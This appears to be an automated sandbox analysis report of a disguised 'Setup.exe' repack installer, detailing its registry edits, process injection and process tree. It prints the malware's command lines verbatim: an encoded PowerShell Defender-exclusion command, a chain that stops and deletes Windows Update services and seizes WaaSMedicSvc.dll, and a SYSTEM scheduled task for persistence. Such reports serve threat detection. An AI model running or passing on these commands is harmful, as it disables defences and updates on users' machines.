b71b505560473d91f00e5f4d3f618851a775e7c70f7cf1fe3759cde75c6bf4e4

General

Target

R3P4CK/Setup.exe
Size

658.7MB
MD5

92f830b3101bd309b56d590e99578fc8
SHA1

f7c6e74ab4f63f09fc062657c5c404139e4de3d7
SHA256

b839a60d0cff7126b15cb0396f563d577fe4ed39cf7827228fa92bf2e5a8505f
SHA512

8cdd25d2ee551d26d4202ef210ed7d2eb01daea26193a4a332e703edf663a4a41808eb2bd661ff376216b23efc5c01729236599aae4227a22d71bf52ac9010af

Score

10^/10

discovery evasion exploit

Malware Config

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe

Executes dropped EXE 3 IoCs

Processes:

randomNAM.exechrome.exechrome.exe

pid process

3636 randomNAM.exe
1536 chrome.exe
1740 chrome.exe
Possible privilege escalation attempt 4 IoCs
exploit

Processes:

takeown.exeicacls.exeicacls.exetakeown.exe

pid process

4176 takeown.exe
4368 icacls.exe
1548 icacls.exe
2656 takeown.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

chrome.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation chrome.exe
Modifies file permissions 1 TTPs 4 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exetakeown.exeicacls.exeicacls.exe

pid process

2656 takeown.exe
4176 takeown.exe
4368 icacls.exe
1548 icacls.exe
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

29 ip-api.com
Suspicious use of SetThreadContext 1 IoCs

Processes:

randomNAM.exe

description pid process target process

PID 3636 set thread context of 2296 3636 randomNAM.exe AppLaunch.exe

pid	process
3636	randomNAM.exe
1536	chrome.exe
1740	chrome.exe

pid	process
4176	takeown.exe
4368	icacls.exe
1548	icacls.exe
2656	takeown.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation	chrome.exe

pid	process
2656	takeown.exe
4176	takeown.exe
4368	icacls.exe
1548	icacls.exe

flow	ioc
29	ip-api.com

description	pid	process	target process
PID 3636 set thread context of 2296	3636	randomNAM.exe	AppLaunch.exe

Drops file in Program Files directory 2 IoCs

Processes:

chrome.exe

description	ioc	process
File opened for modification	C:\Program Files\Google\GoogleUpdater\chrome.exe	chrome.exe
File created	C:\Program Files\Google\GoogleUpdater\chrome.exe	chrome.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

1136 2296 WerFault.exe AppLaunch.exe
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

3924 schtasks.exe

pid	pid_target	process	target process
1136	2296	WerFault.exe	AppLaunch.exe

pid	process
3924	schtasks.exe

Modifies data under HKEY_USERS 51 IoCs

Processes:

powershell.exechrome.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	chrome.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe

Modifies registry key 1 TTPs 18 IoCs

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid	process
3356	reg.exe
2312	reg.exe
3092	reg.exe
428	reg.exe
4124	reg.exe
3556	reg.exe
5112	reg.exe
2052	reg.exe
1912	reg.exe
3732	reg.exe
3660	reg.exe
2548	reg.exe
4456	reg.exe
3416	reg.exe
1832	reg.exe
4424	reg.exe
1612	reg.exe
2956	reg.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exechrome.exepowershell.exe

pid process

4548 powershell.exe
4548 powershell.exe
1536 chrome.exe
4292 powershell.exe
4292 powershell.exe

pid	process
4548	powershell.exe
4548	powershell.exe
1536	chrome.exe
4292	powershell.exe
4292	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

powershell.exeAppLaunch.exechrome.exetakeown.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4548	powershell.exe
Token: SeDebugPrivilege	2296	AppLaunch.exe
Token: SeDebugPrivilege	1536	chrome.exe
Token: SeTakeOwnershipPrivilege	4176	takeown.exe
Token: SeDebugPrivilege	4292	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Setup.exerandomNAM.exechrome.execmd.execmd.execmd.exe

description	pid	process	target process
PID 3856 wrote to memory of 3636	3856	Setup.exe	randomNAM.exe
PID 3856 wrote to memory of 3636	3856	Setup.exe	randomNAM.exe
PID 3856 wrote to memory of 3636	3856	Setup.exe	randomNAM.exe
PID 3636 wrote to memory of 2296	3636	randomNAM.exe	AppLaunch.exe
PID 3636 wrote to memory of 2296	3636	randomNAM.exe	AppLaunch.exe
PID 3636 wrote to memory of 2296	3636	randomNAM.exe	AppLaunch.exe
PID 3636 wrote to memory of 2296	3636	randomNAM.exe	AppLaunch.exe
PID 3636 wrote to memory of 2296	3636	randomNAM.exe	AppLaunch.exe
PID 3856 wrote to memory of 1536	3856	Setup.exe	chrome.exe
PID 3856 wrote to memory of 1536	3856	Setup.exe	chrome.exe
PID 1536 wrote to memory of 4316	1536	chrome.exe	cmd.exe
PID 1536 wrote to memory of 4316	1536	chrome.exe	cmd.exe
PID 4316 wrote to memory of 4548	4316	cmd.exe	powershell.exe
PID 4316 wrote to memory of 4548	4316	cmd.exe	powershell.exe
PID 1536 wrote to memory of 3304	1536	chrome.exe	cmd.exe
PID 1536 wrote to memory of 3304	1536	chrome.exe	cmd.exe
PID 3304 wrote to memory of 4872	3304	cmd.exe	sc.exe
PID 3304 wrote to memory of 4872	3304	cmd.exe	sc.exe
PID 3304 wrote to memory of 5036	3304	cmd.exe	sc.exe
PID 3304 wrote to memory of 5036	3304	cmd.exe	sc.exe
PID 3304 wrote to memory of 4696	3304	cmd.exe	sc.exe
PID 3304 wrote to memory of 4696	3304	cmd.exe	sc.exe
PID 3304 wrote to memory of 1616	3304	cmd.exe	sc.exe
PID 3304 wrote to memory of 1616	3304	cmd.exe	sc.exe
PID 3304 wrote to memory of 1116	3304	cmd.exe	sc.exe
PID 3304 wrote to memory of 1116	3304	cmd.exe	sc.exe
PID 3304 wrote to memory of 2052	3304	cmd.exe	reg.exe
PID 3304 wrote to memory of 2052	3304	cmd.exe	reg.exe
PID 1536 wrote to memory of 1112	1536	chrome.exe	cmd.exe
PID 1536 wrote to memory of 1112	1536	chrome.exe	cmd.exe
PID 3304 wrote to memory of 3356	3304	cmd.exe	reg.exe
PID 3304 wrote to memory of 3356	3304	cmd.exe	reg.exe
PID 3304 wrote to memory of 3732	3304	cmd.exe	reg.exe
PID 3304 wrote to memory of 3732	3304	cmd.exe	reg.exe
PID 3304 wrote to memory of 3416	3304	cmd.exe	reg.exe
PID 3304 wrote to memory of 3416	3304	cmd.exe	reg.exe
PID 3304 wrote to memory of 2312	3304	cmd.exe	reg.exe
PID 3304 wrote to memory of 2312	3304	cmd.exe	reg.exe
PID 1112 wrote to memory of 3924	1112	cmd.exe	schtasks.exe
PID 1112 wrote to memory of 3924	1112	cmd.exe	schtasks.exe
PID 3304 wrote to memory of 4176	3304	cmd.exe	takeown.exe
PID 3304 wrote to memory of 4176	3304	cmd.exe	takeown.exe
PID 3304 wrote to memory of 4368	3304	cmd.exe	icacls.exe
PID 3304 wrote to memory of 4368	3304	cmd.exe	icacls.exe
PID 3304 wrote to memory of 3092	3304	cmd.exe	reg.exe
PID 3304 wrote to memory of 3092	3304	cmd.exe	reg.exe
PID 3304 wrote to memory of 4124	3304	cmd.exe	reg.exe
PID 3304 wrote to memory of 4124	3304	cmd.exe	reg.exe
PID 3304 wrote to memory of 428	3304	cmd.exe	reg.exe
PID 3304 wrote to memory of 428	3304	cmd.exe	reg.exe
PID 3304 wrote to memory of 1832	3304	cmd.exe	reg.exe
PID 3304 wrote to memory of 1832	3304	cmd.exe	reg.exe
PID 3304 wrote to memory of 364	3304	cmd.exe	schtasks.exe
PID 3304 wrote to memory of 364	3304	cmd.exe	schtasks.exe
PID 3304 wrote to memory of 2948	3304	cmd.exe	schtasks.exe
PID 3304 wrote to memory of 2948	3304	cmd.exe	schtasks.exe
PID 3304 wrote to memory of 1968	3304	cmd.exe	schtasks.exe
PID 3304 wrote to memory of 1968	3304	cmd.exe	schtasks.exe
PID 3304 wrote to memory of 2344	3304	cmd.exe	schtasks.exe
PID 3304 wrote to memory of 2344	3304	cmd.exe	schtasks.exe
PID 3304 wrote to memory of 3292	3304	cmd.exe	schtasks.exe
PID 3304 wrote to memory of 3292	3304	cmd.exe	schtasks.exe
PID 3304 wrote to memory of 1956	3304	cmd.exe	schtasks.exe
PID 3304 wrote to memory of 1956	3304	cmd.exe	schtasks.exe

C:\Users\Admin\AppData\Local\Temp\R3P4CK\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\R3P4CK\Setup.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3856

C:\Users\Admin\AppData\Local\Temp\randomNAM.exe
C:\Users\Admin\AppData\Local\Temp\randomNAM.exe
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3636

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2296

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2296 -s 1856
4⤵
- Program crash
PID:1136

C:\Users\Admin\AppData\Local\Temp\chrome.exe
C:\Users\Admin\AppData\Local\Temp\chrome.exe
2⤵
- Executes dropped EXE
- Checks computer location settings
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1536

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHEAbgBxACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbABzAG8AIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdgBxAHoAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdwBnAHoAYwAjAD4A"
3⤵
- Suspicious use of WriteProcessMemory
PID:4316

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAHEAbgBxACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbABzAG8AIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdgBxAHoAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdwBnAHoAYwAjAD4A"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4548

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
3⤵
- Suspicious use of WriteProcessMemory
PID:3304

C:\Windows\system32\sc.exe
sc stop UsoSvc
4⤵
PID:4872

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
4⤵
PID:5036

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
4⤵
- Modifies registry key
PID:2052

C:\Windows\system32\sc.exe
sc stop dosvc
4⤵
PID:1116

C:\Windows\system32\sc.exe
sc stop bits
4⤵
PID:1616

C:\Windows\system32\sc.exe
sc stop wuauserv
4⤵
PID:4696

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
4⤵
- Modifies registry key
PID:3356

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
4⤵
- Modifies registry key
PID:3416

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
4⤵
- Modifies security service
- Modifies registry key
PID:3732

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
4⤵
- Modifies registry key
PID:2312

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4176

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4368

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:3092

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:428

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:1832

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
4⤵
PID:2948

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
4⤵
PID:364

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:4124

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
4⤵
PID:1968

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
4⤵
PID:3292

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
4⤵
PID:1992

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
4⤵
PID:1956

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
4⤵
PID:2344

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "chrome" /tr "C:\Program Files\Google\GoogleUpdater\chrome.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:1112

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "chrome" /tr "C:\Program Files\Google\GoogleUpdater\chrome.exe"
4⤵
- Creates scheduled task(s)
PID:3924

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\chrome.exe"
3⤵
PID:4068

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
4⤵
PID:1188

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "chrome"
3⤵
PID:2508

C:\Windows\system32\schtasks.exe
schtasks /run /tn "chrome"
1⤵
PID:968

C:\Program Files\Google\GoogleUpdater\chrome.exe
"C:\Program Files\Google\GoogleUpdater\chrome.exe"
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:1740

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHEAbgBxACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbABzAG8AIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdgBxAHoAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdwBnAHoAYwAjAD4A"
2⤵
PID:4264

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAHEAbgBxACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbABzAG8AIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdgBxAHoAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdwBnAHoAYwAjAD4A"
3⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4292

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
2⤵
PID:3140

C:\Windows\system32\sc.exe
sc stop UsoSvc
3⤵
PID:308

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
3⤵
PID:4552

C:\Windows\system32\sc.exe
sc stop wuauserv
3⤵
PID:4548

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
3⤵
- Modifies registry key
PID:3660

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
3⤵
- Modifies registry key
PID:2548

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
3⤵
- Modifies registry key
PID:4424

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
3⤵
- Modifies registry key
PID:1912

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
3⤵
